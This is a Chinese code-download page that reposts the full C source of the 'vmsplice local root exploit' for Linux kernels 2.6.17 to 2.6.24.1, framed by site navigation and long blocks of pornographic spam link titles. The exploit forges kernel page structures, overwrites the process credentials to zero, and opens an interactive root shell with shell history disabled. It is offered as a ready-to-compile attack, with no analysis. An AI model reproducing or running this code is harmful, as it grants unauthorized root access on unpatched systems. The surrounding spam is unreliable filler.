亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? linux kernel 2.6.17 - 2.6.24.1 vmsplice local root exploit.txt

?? Linux本地溢出提權的代碼
?? TXT
字號:
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 * 
 * -static -Wno-format  
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};

void	exit_code();
char	exit_stack[1024 * 1024];

void	die(char *msg, int err)
{
	printf(err ? "[-] %s: %sn" : "[-] %sn", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif

#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif

#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}

void	exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] rootn");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------n");
	printf(" Linux vmsplice Local Root Exploitn");
	printf(" By qaazn");
	printf("-----------------------------------n");

	if (!uid || !gid)
		die("!@#$", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lxn", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lxn", pages[0]);
	printf("[+] page: 0x%lxn", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lxn", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lxn", pages[2]);
	printf("[+] page: 0x%lxn", pages[3]);

	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lxn", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lxn", pages[4]);

	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lxn", map_addr, map_addr + map_size);

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);

	/*****/
	if (pipe(pi) < 0) die("pipe", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	die("vmsplice", errno);
	return 0;
}

//  [2008-02-09]

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
成人午夜电影小说| 91精品国产aⅴ一区二区| 色综合色综合色综合| 欧美一级国产精品| 亚洲婷婷综合久久一本伊一区 | 在线亚洲一区二区| 91精品在线观看入口| 亚洲色图制服诱惑| 国产呦萝稀缺另类资源| 欧美日韩一二三| 亚洲人成精品久久久久久| 国内精品久久久久影院薰衣草| 在线免费观看视频一区| 日韩欧美国产一区二区三区| 亚洲一区二区偷拍精品| 懂色av一区二区三区免费看| 日韩女优视频免费观看| 成人综合在线网站| 在线电影院国产精品| 一区二区三区高清在线| 成人免费毛片片v| 精品盗摄一区二区三区| 日韩中文字幕区一区有砖一区 | 欧美成人精品福利| 亚洲国产成人精品视频| 在线观看国产日韩| 亚洲欧美日韩国产综合在线| 白白色亚洲国产精品| 欧美高清在线视频| 成人免费毛片app| 国产精品动漫网站| 粉嫩绯色av一区二区在线观看| 久久婷婷综合激情| 国产成人在线视频网站| 中文在线一区二区| 99久久99久久久精品齐齐| 日本一区二区三区dvd视频在线| 国产美女一区二区| 国产一区二区免费在线| 久久先锋影音av鲁色资源| 久久99国产精品免费网站| 欧美大片顶级少妇| 国产aⅴ精品一区二区三区色成熟| 精品国产不卡一区二区三区| 国产乱人伦精品一区二区在线观看 | 欧美亚洲综合另类| 亚洲午夜精品一区二区三区他趣| 欧美日韩一级视频| 蜜桃在线一区二区三区| 国产偷v国产偷v亚洲高清| 国产高清精品久久久久| 国产精品视频看| 欧洲精品一区二区三区在线观看| 亚洲成人av在线电影| 日韩精品一区二区三区中文精品| 国产一区二区三区精品视频| 国产精品大尺度| 欧美日韩电影在线| 国产真实乱子伦精品视频| 亚洲视频一区在线| 欧美一级免费大片| 成av人片一区二区| 亚瑟在线精品视频| 国产视频一区在线播放| 欧美亚洲综合另类| 国产高清在线观看免费不卡| 一区二区三区国产豹纹内裤在线| 欧美一区二区视频观看视频| 99久久精品国产精品久久| 无码av免费一区二区三区试看| 久久久久久久久久久久电影| 在线免费观看日本欧美| 经典三级在线一区| 亚洲综合色网站| 国产亚洲一二三区| 欧美图片一区二区三区| 福利91精品一区二区三区| 日韩主播视频在线| 亚洲欧洲精品一区二区三区不卡| 欧美一区二区三区在线观看| 成人激情动漫在线观看| 日本欧美在线观看| 一区二区三区在线视频播放| 国产亚洲成aⅴ人片在线观看| 欧美精品v日韩精品v韩国精品v| 国产成人h网站| 麻豆91免费观看| 午夜久久久久久久久 | 日韩欧美一级二级三级久久久| 成人毛片在线观看| 国产在线精品一区在线观看麻豆| 亚洲影院理伦片| 国产精品第五页| 久久久国产综合精品女国产盗摄| 欧美一区二区三区在线| 日本高清免费不卡视频| 丁香另类激情小说| 国产一区二区三区日韩| 免费观看在线色综合| 亚洲成人动漫一区| 一区二区三区成人| 伊人夜夜躁av伊人久久| 国产精品久99| 国产精品久久精品日日| 国产拍揄自揄精品视频麻豆| 精品1区2区在线观看| 欧美一级片免费看| 91精品国产综合久久蜜臀| 欧美日韩国产123区| 欧洲国内综合视频| 欧美日韩精品一区二区在线播放| 色综合久久久久综合| 色综合久久66| 欧美在线综合视频| 欧美三级韩国三级日本一级| 欧美系列亚洲系列| 欧美日韩久久久久久| 3d动漫精品啪啪1区2区免费 | 2021久久国产精品不只是精品| 欧美一区二区三区播放老司机| 欧美一区二区三区视频在线| 欧美一级欧美一级在线播放| 精品人在线二区三区| 久久综合色婷婷| 国产精品女主播av| 亚洲男同性恋视频| 午夜久久久久久久久| 久久99久久精品欧美| 国产真实精品久久二三区| 粉嫩蜜臀av国产精品网站| 91影视在线播放| 91超碰这里只有精品国产| 日韩欧美国产不卡| 中文字幕欧美区| 伊人性伊人情综合网| 日本va欧美va欧美va精品| 国产一区在线看| 97精品国产露脸对白| 337p亚洲精品色噜噜| 国产亚洲欧美日韩日本| 亚洲精选免费视频| 日韩—二三区免费观看av| 国产精品资源站在线| 一本大道久久a久久精二百| 欧美一区二区三区视频免费播放| 欧美精品一区视频| 亚洲美女视频一区| 久久99国产精品麻豆| 成a人片亚洲日本久久| 在线播放欧美女士性生活| 国产欧美日韩在线| 三级精品在线观看| 成人高清免费观看| 日韩免费观看高清完整版| 中文字幕亚洲电影| 蜜臀精品久久久久久蜜臀 | 国产精品美女久久久久久久网站| 亚洲精品日韩一| 韩国v欧美v日本v亚洲v| 色婷婷av一区| 国产日韩精品一区二区三区| 亚洲国产精品嫩草影院| 懂色一区二区三区免费观看| 欧美精品xxxxbbbb| 亚洲女人的天堂| 国产成人久久精品77777最新版本| 欧美亚洲动漫制服丝袜| 国产亚洲精品中文字幕| 日日夜夜免费精品| 99精品国产热久久91蜜凸| 日韩美一区二区三区| 亚洲自拍偷拍九九九| yourporn久久国产精品| 久久综合精品国产一区二区三区 | 精品一区二区久久| 欧美亚洲国产bt| 亚洲天天做日日做天天谢日日欢| 老司机精品视频在线| 精品污污网站免费看| 亚洲欧洲一区二区三区| 国产精品一区在线观看乱码| 欧美一级艳片视频免费观看| 亚洲欧美日韩久久精品| 不卡欧美aaaaa| 国产亚洲精品aa| 国产综合色产在线精品| 欧美xingq一区二区| 日韩av一级片| 欧美一区二区三区在| 婷婷综合另类小说色区| 欧美性videosxxxxx| 一区二区三区在线观看动漫| 成a人片国产精品| 国产精品高潮呻吟| 懂色av一区二区三区免费看| 国产欧美一区二区在线| 国产精品1区2区| 国产欧美日韩麻豆91| 国产成人精品影视| 国产精品国产精品国产专区不蜜 |